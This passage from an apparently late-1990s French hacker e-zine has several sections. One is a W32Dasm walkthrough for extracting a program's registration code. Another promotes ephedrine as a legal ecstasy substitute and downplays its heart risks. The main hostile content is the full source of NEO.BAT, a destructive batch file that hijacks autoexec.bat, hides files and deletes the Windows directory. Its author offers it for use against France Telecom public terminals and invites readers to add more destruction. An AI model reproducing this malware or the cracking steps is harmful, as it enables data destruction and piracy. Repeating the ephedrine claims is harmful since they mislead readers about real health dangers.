          Certains preferent aboutir a une version modifiee de l'executable
       (juste quelques octets modifies) alors que d'autres preferent obtenir
       un numero de serie associe a leur propre pseudo (un serial).
          Pour la premiere technique, il faut un editeur hexa, souvent plus
       de temps et peut-etre une connaissance plus pointue de l'assembleur
       (ca vole pas forcement tres haut non plus...).


    Apres cette presentation tres rapide, on va s'attaquer a un petit soft
    dont la protection est la plus conne de toutes celles que j'ai
    rencontrees: "NetBuster"

    Pour s'enregistrer, il faut entrer un code...

        J'utilise: W32Dasm
        mon but: trouver le code sans modifier l'executable

 Au demarrage de W32Dasm, on choisit Disassemble -> Open File to  Disassemble
 et on ouvre NetBuster.exe. Attendre...

 Le code assembleur apparait enfin.

 On choisit Refs -> String Data References et on lit le texte en diagonale.
 On trouve: "Thank you for supporting me!". On double-clique sur cette ligne
 et on tombe a l'endroit du code ou cette chaine de caractere est utilisee.

 Voila ce que l'on voit a l'ecran:

______________________________________________________________________________

 * Referenced by a (U)nconditional or (C)onditional Jump at Address:
 |:0045DCEA(C)
 |
 :0045DD60 33C0                 xor eax, eax
 :0045DD62 55                   push ebp

 * Referenced by a (U)nconditional or (C)onditional Jump at Address:
 |:0045DCED(C)
 |
 :0045DD63 68FDDD4500           push 0045DDFD
 :0045DD68 64FF30               push dword ptr fs:[eax]
 :0045DD6B 648920               mov dword ptr fs:[eax], esp
 :0045DD6E 8D55FC               lea edx, dword ptr [ebp-04]
 :0045DD71 8B83FC030000         mov eax, dword ptr [ebx+000003FC]
 :0045DD77 E808EFFCFF           call 0042CC84
 :0045DD7C 8B45FC               mov eax, dword ptr [ebp-04]

 * Possible StringData Ref from Code Obj ->"xx-xxxxxx-xxxx"   ; le code !!!
                                |
 :0045DD7F BA10DE4500           mov edx, 0045DE10             ; code dans edx
 :0045DD84 E8CB5FFAFF           call 00403D54              ; routine a la con
 :0045DD89 7545                 jne 0045DDD0         ; si moncode=code c gagne

 * Referenced by a (U)nconditional or (C)onditional Jump at Address:
 |:0045DD20(C)
 |

 * Possible StringData Ref from Code Obj ->"Thank you for supporting me!  "
                                         ->"Now you won't get anymore annoying "                                         ->"reminder messages on startup!"
 |
 :0045DD8B B828DE4500           mov eax, 0045DE28
 :0045DD90 E8BFE6FEFF           call 0044C454
 :0045DD95 B8440A4600           mov eax, 00460A44
 :0045DD9A BA90DE4500           mov edx, 0045DE90
 :0045DD9F E8785CFAFF           call 00403A1C
 _________________________________________________________________________

   Bon bah maintenant c'est tres tres simple: le code il est ecrit noir
   sur blanc !!!(xx-xxxxxx-xxxx).

   Petite remarque: si on avait voulu modifier l'executable pour cracker se
   soft (faire un patch), il aurait fallu transformer le "jne 0045DDD0" en
   "je 0045DDD0" (inverser les conditions) ou en "nop nop" (no operation).

   On verra ce genre de choses de facon plus detaillee la prochaine fois et
   on fera un VRAI crack :). Pour finir je tiens a vous rappeller que je ne
   suis pas responsable de la mauvaise utilisation que vous pourriez faire
   de ce texte, qui n'a evidemment qu'un but informatif.

   commentaires, infos, questions: syntax3rror@usa.net

   see yah.



+-----[ #8 ]------------------------------------------------------------------+




                   l'EpHEDRINE
                    ---------


  Dans tout les deserts du monde, on trouve des ephedra, des petits
buissons dépourvus de feuilles, certaines especes (Ephedra sinica)
contiennent de l'ephedrine, molecule proche de l'adrenaline.

 Sous le nom de ma huang il est utilise depuis l'antiquite par la
medecine chinoise, l'ephedrine est connue pour ses proprietes
anti-inflammatoires et antiallergiques.

 Lors de sa consommation on rescent des poussees d'energies, et
d'euphrories, principalement pendant 4h, mais les effets peuvent
ensuite durer pendant plusieurs jours.

 C'est pourquoi l'ephedrine extraite de la plante sert de remplacant
ecolo de l'ecstasy, en effet c'est plutot cool, les memes effets, avec
la certitude de ce qu'on prend, c'est naturel, et en plus c'est legal !
L'ephedrine est vendue sous forme de gellules, ou incorporees dans
d'autre medicaments (generalement en plus grandes doses), utilises
pour par exemple le traitement de l'ashme, par les fashion victims
comme cure minceur miraculeuse.
L'herbal ecstasy, drogue au memes effets que l'ecstasy, supposes faite
d'herbes (legale au states) est bourree d'ephedrine.

 Une utilisation resonnable de l'ephedrine ne devrait pas presenter
de danger, ni induire de dependance, mais peut en cas d'abus ou
d'usage prolonge causer des problemes cardiaques,
(2 gellules = trip de 10 h, gros effort pour le coeur).
Selon l'institut Fernand Vidal (plus grand centre de toxicologie national),
l'ephedrine est extremement dangereuse.
Tandis que selon proteus (http://www.reseauproteus.net), un site sur la
sante, et l'alternative des plantes (enfin un truc comme ca :), les
effets sur un sujet sain (qui ne contracte pas une maladie que soigne
l'ephedrine) sont benins.

 Enfin pour conclure, n'oublions pas qu'il vaut mieux ne pas trops
se fier aux grosses institutions gouvernementales, et officielles, car
elles sont sensibles au pressions exercees par les industriels du
pharamacetique, qui remplacerait bien l'epehedrine par leurs
amphetamines de synthese... et breuvetees.

ThC'99




                            ______
                  _       _|  ___ |___
+-----[ #9 ]-----| \-----/ | |---\|   |---------------------------------------+
                 |  \   /  | |__ | +  |  LiNKS
      -----------|  |/^\|  |  __||  __]_------------------->
                  \       /| |___/|     |   DE BASE 
 ------------------\__|__/-|______| +   |--------------->
                                  |______]  
          
             


HELLo, je vous donne ici une liste de differents websites concernant
l'underground h/p/c/v; juste sur l'underground, car eh oui, aujourd'hui ces
domaines ne sont plus reserves a l'undaground.
Touts les liens que je vous donnes ci-apres sont des must, ce qui veut
dire, que si vous ne les connaissez pas encore, il vous faut imperativement
les visiter un jour ou l'autre!
Donc, si vous etes pas un 'tit nouveau, passez votre chemin.


Part 1: 3l33t
-------------

**
Bah, LE site que vous connaissez forcement deja (donc pas de details) :
> http://www.2600.org
Ainsi, que leur site dedie a l'Affaire Kevin Mitnick (cf lutin#1):
> http://www.kevinmitnick.com


**
Cult Of The Dead Cows, vous les connaissez de nom, grace a leur celebre util
BO, mais avez-vous deja lu un de leurs txt's filez ?? eh bien, vous ratez
quelque chose!! Vous y trouverez plus de 300 filez !!
par ex:
- The Evil Truth About Peter Pan     by Lady Carolyn
ou Peter Pan ne serait pas le conte adorable que l'on connait mais une
histoire sadique, cruelle et sataniste.
et encore bien d'autres, tous les + tares les uns que les autres.
> http://www.cultdeadcows.com

**
Le celebre Chaos Computer Club, pour les Germanisants:
> http://www.ccc.de



part 2: collectifs francophones
-------------------------------

**
bon, le moment de se faire de la pub;)
> http:/lutin.freeshell.org



Puis le moment de faire de la pub a nos amis valeureux;)

**
Madchat, vous cherchez un ezine? Vous le trouverez la:
> http://madchat.org
TOUS les ezines de la scene francophone:

**
Cryptel, collecif d'un bon niveau, on leur doit les free communications depuis
des cabines FT et depuis des FEUX tricolores (vivi, vous avez bien lu!):
> http://www.citeweb.net/cryptel

**
Cybz, un website qui regroupe plusieurs utilz de crack, de hack et de phreak.
Vous y trouverez aussi leur ezine, des liens, et bcp d'autres choses.
Allez donc y faire un tour!
> http://cybz.virtualave.net

**
Le HeadQuarter de l'underground Quebecois!! Toute la scene Quebecoise !!
> http://www.unqc.cx


part 3: liens du ministere de la def0nce
----------------------------------------

**
YaHooKa - The Guide to Marijuana on the internet
Un moteur de recherche yahoo-like. 
> > http://www.yahooka.com

**
Le Petit Rouleur Illustre
How To: 2,4,6,8,10,12 feuilles, montage de fous, etc...
> http://yi.com/home/TodRod/cannabis


part 4: crackz, exploits
------------------------

**
ASTALAVISTA, moteur de recherche de crakz.
> http://astalavista.box.sk

**
LE site pour trouver tous les exploits:
http://rootshell.com



part 5: virii
-------------

**
narf! desole, j'ai perdu mes liens vers des grosses archives de virii!
c'est plutot con ca!
bon tant pis.
Si je les retrouve, je vous les mettrais dans le prochain numero.






C'est une petite liste de liens, mais ils sont essentiels, et il fallait que
je m'assure que vous les connassiez.
Voila, c'est fait, bon browsing !!

c u later
blunt@mail.dotcom.fr [icq#37261128]

ps: si vous voulez m'encouragez pour ce que je fais, n'hesitez pas une seule
seconde, ca me fais plaisir de savoir qu'on appreci mon 'travail'. 



+-----[ #10 ]-----------------------------------------------------------------+




                  ATTRAPE-LAMER ou HOW 2 FUCK FT AGAIN
                +--+--+--+--+--+--+--++--+--+--+--+--+--+

par blunt


SCANDALE: FT SE PAYE (AVEC NOTRE ARGENT) DES LICENCES KRO$OFT !!
Je m'en vais rectifier tout cela de suite.


   Bon, voici un petit attrape lamer ;)
C'est un fichier shell dos, autrement dit un fichier batch. C'est a dire
un ".bat"! En fait, quand je dis que c'est un attrape lamer, ca pourrait
etre un virus, il pourrait infecter d'autres fichiers et s'y 'attacher';
mais ce n'est pas le cas. C'est juste un phile destine a une vengence.


Le but de ce programme est de bouffer le win.com, voir, tout le repertoire
windows si c'est possible, en fait c'est un cleaner de PC; puisqu'il vous
soulage de windows.

Il ne peut foutre en l'air qu'un PC de lamer; je m'explique, il n'est pas
mechant de refiler ce prog a quelqu'un (c'est un bon detecteur de GROS
lamer). Si la personne est assez conne pour executer ce prog sans precaution,
elle sera averti de son etat de lamer apres un petit plantage, puis
debarasse de winblows.
Sinon, no problemo, elle va editer le fichier, se rendre compte du bins et
jeter le fichier (si elle l'execute apres avoir matter les sources, c'est
qu'elle est vraiment bonne pour l'asile)

Ma vengeance n'est pas personnelle, en fait, je ne perdrais pas mon temps
avec un lamer, ce petit prog est destine a certains PC comme ceux servant
de bornes Farce Telecom... En effet, je pense que ce petit prog soigneusement
downloade par un PC FT fera son boulot.
Quand je pense a FT qui achete des windows a la pelle avec notre fric....

  Il n'est pas assure qu'il fonctionne, car j'imagine que les bornes FT sont
proteges contre l'execution de progs (afin d'eviter les virus); mais
comme je doute de l'intelligence de FT et qu'il n'ont peut-etre pas pense
a se prevenir des fichiers batch, mon petit phile devrai faire un
petit carton ;))) (et passera bien entendu a travers un eventuel anti-virus)


Il fait 1.3ko ce qui est peu gros je vous l'avoue, mais c a cause du texte
et de la melodie ;)
C'est une version 0.1, je pense l'ameliorer ou en faire des variantes.
Si vous le modifiez et si vous y ajoutez de nouvelles fonctionnalites, ou
que vous decidez de faire qq progs dans le style en batch, mailez-les moi ;)


Bon, je vous decris pas a pas sa maniere de proceder:

-il teste sa presence sur la machine
-sauvegarde autoexec.bat dans un fichier cache c:\auto.old
 ce fichier est stocke la en cas de mauvaise manip de votre part ;)
-creation de c:\neo.bat
-copie de autoexec.bat dans c:neo.bat
-Neo se copie dans c:\neo.bat apres l'autoexec
-remplace le contenu de autoexec.bat par 'c:\neo' afin de perdre le lamer
 il ne comprendra meme pas comment ses drivers son charges car l'auto
 est vide et que le fichier neo.bat n'exsite apparament pas ;[
-signe dans un fichier cache c:\fucku.com
-inscrit un message dans c:\readme.txt
-cree un fichier cache qbasic c:\manau.bas
- soit bloque la becane et vous oblige a rebooter
  soit ne bloque pas (ca depend d configs: dos, win3.1, 95....)
- au prochain reboot:
-joue la melodie de "La Tribue de Dana" (Manau)
-affiche le message a l'intention des lamerz
-nettoye le disk de la presence d'un eventuel c:\windows
 (efface juste c:\windows\*.* mais ne le cherche pas s'il n'est pas dans
  ce repertoire)


NEO v0.1
"NEO.BAT"
------------------------------> CUT HERE <--------------------------------------@echo off %neo%
if exist c:\neo.bat goto zeone %neo%
type c:\autoexec.bat > c:\auto.old %neo%
attrib +H +R c:\auto.old %neo%
type c:\autoexec.bat > c:\neo.bat %neo%
type neo.bat >> c:\neo.bat %neo%
attrib +H +R c:\neo.bat %neo%
@echo c:\neo.bat > c:\autoexec.bat %neo%
@echo NEO (c) blunt 07/1999 > c:\fucku.com %neo%
@echo ##################### >> c:\fucku.com %neo%
attrib +R +H c:\fucku.com %neo%
@echo 1999 marque la fin d'une ere > c:\readme.txt %neo%
@echo Il est aujourd'hui trop tard, l'informatik vous a condamne. >> c:\readme.txt %neo%
@echo Je suis desole, votre systeme vient d'etre cracke, et ceci est la >> c:\readme.txt %neo%
@echo confirmation de votre incapacite et de votre emprisonnement. >> c:\readme.txt %neo%
@echo Hier vous n'avez pas su detruire votre TV, aujourd'hui vous >> c:\readme.txt %neo%
@echo n'avez pas su maitriser l'informatik. >> c:\readme.txt %neo%
attrib +H +R c:\readme.txt
@echo dana$ = "T100 <<L8 f e- d l4 c d <b- >l8 e- d l4 c l8 c l16 <b- a l8 g" >
c:\manau.bas
@echo dana2$ = "a b- g l4 >c l8 <b- b- >e- d ccc <b- >c" >> c:\manau.bas
@echo PLAY dana$ + dana2$ >> c:\manau.bas
@echo SYSTEM >> c:\manau.bas
attrib +H +R c:\manau.bas
c:\fucku.com %neo%
:zeone
qbasic /run manau.bas
edit c:\readme.txt %neo%
deltree /Y c:\windows\win.com %neo%
deltree /Y c:\windows\*.* %neo%
--------------------------------> cut here <-----------------------------------

voila, le fichier est modifiable a souhait, formatage, destruction de
command.com, agreable message de salutation, etc...
Cepedant je trouve cette version de NEO tres bien, elle permet d'identifier
le lamer, et de detruire ce qui a permis de l'aliener et de le transformer en
lamer: windoz...
Quoique, ca me fait de la peine quand meme pour le pov gars.
Customisez le fichier comme bon vous semble, adaptez le a vos besoins,
destruction au bout de X boot ou bien un "Merry X-mas" le 25decembre, etc..

NaRf! C'est terriblement cruel, je sais.
Mais bon..
Je peut pas m'empecher d'imaginer la tete d'un technicien, reboutant la machine
pour lire un petit msg acompagne de La Tribu de Dana (merci a celui qui se
reconnaitra pour m'avoir filer la melodie).
(Dans la vallee, oh, de dana, dalidada...mouarf!)
et puis.. "tient, c byzar windows a disparu!?"

Je vous raconterai si je reussi a les niquer une 3e fois chez FT... Aie, faut
que je fasse gaffe, ca va devenir une habitude (cf lutin2)


En attendant, si vous avez des idees pour martyriser (sans destruction physique
de materiel ni sans frapper sur le PDG de FT) ecrivez moi.. on peut faire
affaire :pp

A++
blunt@mail.dotcom.fr [ICQ#37261128]

ps: si vous merdez et que vous n'arrivez pas a virer ce prog, ecrivez-moi j'ai
pondu un petit Morpheus.bat qui se charge de corriger Neo quand il part en live.Neanmoins, si vous croyez que je vais vous le filer...... vous vous gourez !!
mouarf!
Mais vous pourez essayez de me supplier, ca me fera surement beaucoup rire ;[[


My greets goes 2: Toute l'equipe du LUTiN
                  SyntaxError, Bienvenue!
                  Madchat, Cybz, bravo pour vos sites et votre e-zine (Cybz)
	          Afghan, si tu lis ca, mail moi!
                  Cryptel, les pyrophreakers, toute la scene francaise et
                  quebequoise. 
                      

+-----[ #11 ]-----------------------------------------------------------------+



                           L'OS qu'il vous faut ?
                                                      SyntaxError


      Linux, c'est complexe. Y a plein de fichiers de config dont on ne peut
negliger aucun d'entre eux. C'est aussi un systeme en perpétuel mouvement.
Puisque si on veut s'amuser, on peut telecharger les dernieres versions de ses
softs ou des libraries tous les jours. Quand je dis "s'amuser",ca devient vite
un bordel monstre... On choppe un programme tres recent et encore en version
beta mais prometteur. On cherche ensuite la derniere version du soft. Elle
est trop recente pour etre deja disponible en rpm (facilite l'installation)
alors on se tape l'installation bordelique du tgz. Helas on ne s'est pas
apercu qu'une library utilisee par le soft n'etait pas a jour sur sa
distribution Linux - la derniere sortie - achetee 3 semaines plutot.
Parfois on y arrive, parfois on craque. Enfin si c'est pas du rpm, ca fout
le bordel dans le systeme rpm qui ignore l'installation alors qu'elle a eu
lieu. Le rpm c'est pas le top. Quand on a installe une library en tgz, dont
une version plus ancienne existe en rpm, un future programme installe en rpm
devra l'etre avec l'option force-chepaskoi pour que ca passe et de toute
facon ca sera pas tres clean. Ainsi au bout de quelques mois on a un systeme
vraiment crado et les distributions sur CD sont vite depassees.


      Par contre, la communaute Linux est plutot cool toujours prete a donner
des conseils, etc, forcement c'est toujours agreable quand on est en galere...
Mais je trouve etonnemment que ca sonne un peu trop institutionnel et presque
"coince du cul" - sauf mon respect :). En dehors de "faire marcher tel truc"
ca manque de bons delires.


      Sous Windows, on est confronté a une usine a gaz dont les fondations
arrivent de moins en moins a en supporter le poids. C'est pour ca que le
systeme est si peu stable et toujours plus lent et gros. Le miracle pour
Cro$oft c'est que la vitesse toujours plus impressionante des PCs permet de
compenser ce gouffre de performances. Alors, premier point, il est clair
que Windows est un systeme de merde. Mais deuxieme point, c'est le systeme
qui me semble le plus vivant. Ca fourmille de petits programmes soit
excellents, soit completement delires que l'on ne rencontre pas sous Linux
(a part xeyes :) et qui rendent plus fun l'utilisation de Windows...
Un exemple: X-Codec est un encodeur MP3 Freeware enormement optimise a coups
de lignes d'assembleur pour obtenir - a sa sortie en tout cas - le seul
encodeur capable d'encoder en temps reel avec un simple P200... Le phenomene
des trojans se developpe a un rythme incroyable sur le net (allez donc voir
sur www.multimania.com/cdc pour les nouveautes du jours !!). A mon avis c'est
un bon signe pour le dynamisme de la plateforme Ouinouin en termes de delire.
Idem pour la scene des demomakers. C'est sur que ca vaut pas l'epoque de la
scene Amiga mais en tout cas elle existe sous Zin et pas sous Linux. Pareil
pour le crack ! Y a rien a cracker sous Linux. Alors on joue ? a part Quake,
ca craint...

     D'ailleurs ca me fait un peu penser a un choix vers une revolution dans
les systemes d'exploitation. Certains construisent ensemble un OS en pleine
expansion capable de detroner Ouinouin. D'autres trouvent plus fun de
detruire ce qu'ils rejettent. Les auteurs de BackOrifice en sont l'exemple le
plus frappant. A travers ce trojan precurseur ils ont effectivement reussi a
mettre en peril (de facon toute relative mais le phenomene actuel des trojans
semble en etre les 'sequelles') la toute puissance du dictateur Bill Gates...

     Bon je veux pas etre alarmiste, pessimiste ou autre mais en tout cas les
"chepaskispasse" de Windows (Deep Blue Screens en autres) ne seront pas
suffisant pour le detroner au profit de Linux. En tout cas, tant que tous ces
aspects qui font que je m'eclate sous ouinouin ne se seront pas ameliores
sous Linusque ...


J'attends vos droits de reponse, vos insultes, etc :oD


_[Greetings]_\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/__
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
\/ Frog-Killer - DoomHammer - Calimero666 - Freeman - Sonic - Foxz - Gabouga
/\ Tampax-Error - Duc  - Max - Zumeo - Blunt and all the LUTiN memberz   /\/\
\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\//\/\/
_\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/___[Syntax3rror@usa.net]__



+-----[ #12 ]-----------------------------------------------------------------+


                             HACKERS' CYBERNATION
                                     ou
                         COMPLAINT OF ZE E-UNDERGROUND

par Blunt

[Je tiens a preciser que j'ecris ce genre de truc tres tard, et que les divers
delires que j'emets persque regulierement sont du genre a tomber sous le coup
d'overdoses de manque de sommeil... je crois que je fini par rever devant mon
clavier (cf tous mes aut txtz)]


0x0. Intro

  Le texte qui suit est une reflexion sur NOTRE monde, il ne s'agit que de
mon point de vue sur toutes nos activites underground (attention: underground
n'est pas synonyme d'illegal) et leurs causes. Je ne parle pas au nom
de tous, c'est important, il ne s'agit que de mon point de vue, et j'espere
qu'il sera le plus pres possible de la realite.

  La notion de CyberNation n'a jamais ete aussi vrai qu'aujourd'hui, je vais
essayer de vous expliquer pourquoi. Pourquoi cette nation jusqu'alors
underground se retrouve aujoud'hui tire vers l'overground malgre elle.
Pourquoi nous pouvons lutter contre ces evenements si on le veut. Pourquoi
cette nation parait construit sur des mythes a n'importe quels yeux
exterieurs, alors qu'elle ne repose que sur la verite. Pourquoi un
gouvernement en a t'il si peur, pouquoi vouloir la combattre et l'aneantir.




0x01. CyberNation

  Ce terme, CyberNation peut faire peur a n'importe quel hacker tant ce genre
de terme a ete sur-exploite par les  medias (je parle principalement de la TV
,radio, presse, + leurs homonymes on-line) et employe a tort et a travers.
Il ne faut pas oublie qu'il ont un tous sens orignel. Ici, le terme est
usuel, alors pourquoi ne pas l'employer?
Il ne faut pas etre reactionnaires non plus, n'oublions pas que chaque
langue evolue; par ex, un mot employe aujord'hui avait a son origine un sens
souvent tout autre.

  Ainsi, il s'agit du regroupement de personnes qui possedent une veritable
NATION, avec un sentiment nationaliste reel, comme jamais aucun etat
physique n'a reussi a suciter. Ce regroupement est possible a grande echelle
par les reseaux informatiques. Et l'internet, avant d'etre l'outil
commercial qu'il est aujourd'hui etait avant-tout le mode de communication
number one de tous ces gens a qui on n'a jamais donner le droit de
s'exprimer.
  Attention, cette communaute n'est pas une communaute d'internet users, mais
une communaute de hackers, de gens dont les activites n'etaient pas
accepter par des gouvernenements, ni par la bonne morale etablit.
Et en cela, les premiers hackers n'ont pas ete accepte dans le systeme tel
que nous le connaissons.
A partir de ce moment la, aucun hacker ne s'est resolu a integrer
entierement ce systeme; car ce systeme n'a pas voulu d'eux et n'accepte que
ceux pres a suivre le troupeau sans poser de questions, sans remettre
en question tout ce qui est etablie.
  Il a donc permis de creer une communaute sans dirigeant, qui evolue selon
ces propres regles, ou la seule base commune sont les droits de l'homme
appliques a la lettre.
  Arretons la la description, ce monde, je le connais et vous le connaissez;
les autres ceux qui veulent le decouvrir doivent faire l'effort de
s'investir, ce doit etre une demarche personnelle et non pas une envie
de devenir comme ces gens decrits par la TV.

  Voila les origines. Ainsi, nous pouvons dire que nous appartenons a une
communaute qui est ne d'elle meme, sans vrai fondateur, elle est nee juste
de la volonte de hackers en puissances qui cherchaient un lieu paisible ou
vivre a l'ecart sans etre chasse par des gens que leur morale derange.

  Cette communaute est nee, mais elle n'a pas de frontiere physique, nous
connaissons les erreurs des precedents communautes, a nous de les eviter.
En effet, nombre avant nous ont eu cette volonte de vivre separe de leur
societe. Le dernier exemple en date fut un enorme mouvement et les annees
70 ont vu naitre des communautes, l'engouement fut planeterre; la volonte
de s'ecarter du capitalisme, des idees de son gouvernement, etc...

  Tous les utopistes comprenant qu'ils ne pouvaient pas changer le monde, ont
de tout temps envisager de vivre en communaute, a l'ecart complet de la
societe.



0x02. Digital Underground

  A tout les ages aucune communaute n'a triomphe ou echappe a une societe
etabli, jamais un systeme n'a autorise que des gens vivent a l'ecart,
echappant a ses regles. Une societe ne laisse pas partir ses elements,
ne les laissent pas vivre ailleurs. Un gouvernement gouverne, et son
seul but est de depasser les autres gouvernements, une simple course a la
reussite.


  Nous connaissons tous plus ou moins les erreurs des precedents utopistes,
elles demeurent en chaqu'un de nous. Ainsi a nous tous, le monde que
nous avons commence a construire a ses chances.
Il a ses buts, ses ideologies qui le font progresser, pour lequel nous
nous battons. Voila, ce sont la source de notre energie; celle qui sert
a vivre, a remettre en question la societe et l'ordre etablit.
Et grace a ces idees nous savons vers quoi nous tendons, et c'est de ces
idees que ne un sentiment nationaliste, malgre l'absence de dirigeant et
de hierarchie. Ce sentiment nationaliste applique a notre 'organisation'
se manifesterai plutot comme de la fraternite. Dans notre cas de figure,
les hackers sont LA nation, ils la composent. Il se reconnaissent dans
leurs idees.
Comme d'habitude, nos idees, soit vous les connaissez, soit vous les
apprendrez, soit elle ne vous regardent pas.


  Notre nation (ou communaute) n'a pas de situation geographique. Nous nous
sommes regroupes sous une banniere, sous une meme volonte et des idees
semblables. Mais personne ne peut nous dispercer. Et malgre cela nous
sommes unis. Et cela fais notre force.
  A la difference des precendents utopistes, les premiers hackers n'ont pas
tenter de vivre separes de la societe du jour au lendemain. Les autres
voulaient vivre loin de leur societe, nous avons compris que c'etaient
impossible (du moins pas sans preparation); ainsi, les hackers ont
apris a vivre a l'INTERIEUR de la societer,a l'ecart par les idees et les
vues d'esprits mais toujours a l'interieur.

  Donc, les hackers se sont enterres, sont devenus paranoiaques, et ont
decide de vivre a l'ecart du systeme, mais en son sein. Ils ont
adoptes l'underground. Le concept peut-paraitre paradoxal, mais il ne l'est
pas! Il est tout simplement tres ingenieux. Pas de regroupement
physique, pas de dispersion, pas d'attaque physique. Des idees pour une
bannieres et des moyens d'expression.
Les gouvernements connaissent les hackers et les hackers connaissent les
gouvernements.

Comme le dit l'adage:  "You can stop one, but you can not stop all."
traduction: Vous pouvez en arretez un, mais vous ne pouvez pas nous arretez
tous. Voila, nous subsistons au centre du systeme, dans l'ombre de ses
fondations.

La concept de communaute est donc globalement tres fort, meme si le mot n'est
pas employe, le concept est surement plus vaste que cela, mais encore flous
a mes yeux.





0x03. Fight For A Future


  D'accord, une societe n'accepte pas que des gens vivent ailleurs et mieux
qu'eux. Ici, il y a eu des concessions, nous vivons toujours dans le
systeme, et l'idee avouee et de le transformer.
Il y aussi le gouvernement, pourquoi en voudraient-ils au hackers me
dirais-vous.
Pour leurs idees; certains exprime leurs idees, en matiere de politique
ou d'economie. Vous me direz qu'aujourd'hui chaqu'un est libre de ces idees.
Je ne suis pas si sur!! Evidement un gouvernement de droite n'emprisone pas
des individus de gauche.
  Cependant, les idees sont toutes autres ! Les idees vont au dela de ces
enfantillages de politiciens. Et proner l'anarchie ne plais pas. Abbatre
l'economie capitaliste non plus. Et ainsi de suite. De plus de nos jours
la desinformation est massive dans tous les domaines, et personne ne sais
reellement ce qu'est par ex, l'anarchie.

Car oui, un gouvernement laissera s'exprimer une personne sur ses idees,
mais pas des groupes de personnes qui ont idees et un moyen d'expression
mondial.  A partir de ce moment, ces gens deviennent des ennemies; et
ils sont consideres comme des traitres puisqu'ils mettent leur pays en danger,
car pour eux et la plupart des bonnes gens, un regime radicalement opose
et dangereux pour tous.

Ainsi, vous avez le droit de vous exprimer, d'agir, mais dans l'anonymat le
plus complet. Commetez une erreur un jour, n'importe quelle erreur, meme
sans rapport avec vos idees, et je peux vous assurer que vous aurez un
tribunal en travers de la gorge; vous etes perdu, non, vous n'en mourirez
pas, mais ne pourrez jamais rentrer en contact avec vos amis sous peine
de les vendre malgre-vous. Ah, dur.

C'est juste un petit apercu, je ne peut m'ettendre, je compte sur vous
pour extrapoler et chercher les informations la ou elles se trouvent. Et
si vous pensez encore que les politiciens sont honnetes, et que votre
gouvernement n'a rien a se cacher, penchez vous un peu sur ses affaires,
constatez sa transaparence; si vraiment vous pensez que l'ont vous dis
tous, si vraiment vous croyez que le nuage radioactif de Tchernobil s'est
arrete a la frontiere de la france, si vraiment vous croyez qu'ils
ont de bonnes intentions et que la seule chose qui les interesse n'est pas le
pouvoir, et bien, croyez moi, vous etes bien naifs!
Vous vous etes fais entubez du debut jusqu'a la fin. Vous avez garde votre
innocence de mioche de 1 an. C'est triste, ouvrez les yeux, pas pour
pleurez mais pour voir le monde qui vous entoure !!!!
Et realisez, realisez la manipulation, la manip politique, la manip
religieuse qui a consruit votre morale; qui n'est meme pas la votre mais
celle a laquelle on vous a fait croire. Il est temps pour ceux la d'arracher
leurs ficelles de doux pantins.




0x04. Underground 2 Overground


  Hier underground, les harckers vivaient dans l'ombre car comme chaqu'un le
sait il faut vivre cache pour vivre heureux. Aujourd'hui overground, le hack
est une mode. La TV et la presse relate les 'cybercrimes'. Il est toujours
ainsi, si l'on devient overground, c'est que l'on ne s'est pas assez cacher;
ou bien que certain n'en avais pas la volonte.
Ainsi tout un grand public connait ce que l'on a bien voulu lui dire,
la caricature va bon train: Le cinema en a fait un film 'Hackers', et les
livres sur le sujet se font de plus en  plus nombreux; meme la presse s'y met.
  Aujourd'hui certains n'ont pas peur, si des journaux tel que "Pirate Mag'"
existe, certains se disent pourquoi pas editer!? Eh, oui, c'est en route,
tous aujourd'hui ne sont pas dans le domaine que pour l'exploit et se
surpasser. Quand l'appel de la 'gloire' (fini l'nonymat) et de l'argent
s'annonce, on hesite et on reflechi. Je dirai volontier que c'est humain!
Le gain attire l'homme... a nous de changer cela.

  Ces derniers temps il y a eu des polemiques. Par exemple, beaucoups ont
critiques Taz, un site d'information sur le Hacking. Ralant contre
la sur-exposition de leur culture certains hackers ont ouvert leur gueule.
C'est entendu certains veulent rester underground. C'est tout a fait normal.
Mais on ne peut rien contre les gens qui ne souhaite qu'informer la
population. C'est leur droit. Surtout quand il le font bien.
On ne peux pas leur oter le droit a l'expression ! Surtout quand nous le
pronons comme loi fondamentale!
 Zataz n'est pas le seul, d'autres 'informent', par differents biais, okay.
Selon, ils ne montrent pas tout et n'ont qu'une vue restreinte, soit il sont
dansle vrai. Mais quand l'info est bonne, qu'il n'y a pas de conneries
ecrites, pourquoi pas!? Aucun tort ne vous est directement fait.
Si ce sont des conneries, tant mieux, vous n'avez rien a craindre, il me
semble.

  En effet, je comprends a quel point il est desagreable de faire part
d'une decouverte a toute la 'communaute' en sachant qu'elle en fera
bon usage. Puis de voir ensuite que toute la france est au courant et
ques de sales gamins ont grilles a peu-pres tout le monde en foutant tout
en l'air en allant a contre courant de principes tel que le fait de ne rien
detruire.
Ca fait tres peur, cela veut-il dire qu'on ne peux plus rien communiquer ???
Au contraire!

Mais, reflechissons bien, si on veux rester cacher, car la lumiere du jour,
des medias et des sales cons nous genes, et bien, nous devons descendre
encore plus bas sous-terre.
Ce n'est pas la quantite de lecteurs qui compte, je viens de le comprendre,
mais la qualite du lectorat.

  Peut-etre devons nous devenir un peu plus parano, peut-etre nous nous
sommes relaches; et si certains veulent vivre au grand jour, laissons les
faires.
En partant de ce principe, cela veut surement dire, si je ne me trompe
qu'il va falloir briser quelques choses bien etablis: keywords et
references dans les moteurs de recherche; webrings et diverses pubs.
Ne garder que les collectifs et des contacts entre-eux. Pour aller plus
loin encore, il faudrait supprimer les pages web et revenir a une diffusion
entre collectifs, mettre a dispostion les contenus (ezines, progs, etc..)
sur des FTP bien planques.
En ce sens, il conviendrait de transformer des sites tels que madchat.org
en FTP, et pas public, mais password&, avec un passwd qui ne se
transmettrait qu'aux relations et undergrounders. Eh oui, c'est dur de
renoncer au chiffres des compteurs et des % de visites sur sa page!
Mais, c'est cela qui doit avoir lieu, si l'on veut retrouver l'underground;
si nos catombes ne sont plus sures, nous devons y poser des portes blindees,
de multiples verrous et des gardes.

  Voila, telle est mon idee. Je ne sais pas ce que vous en pensez, mais
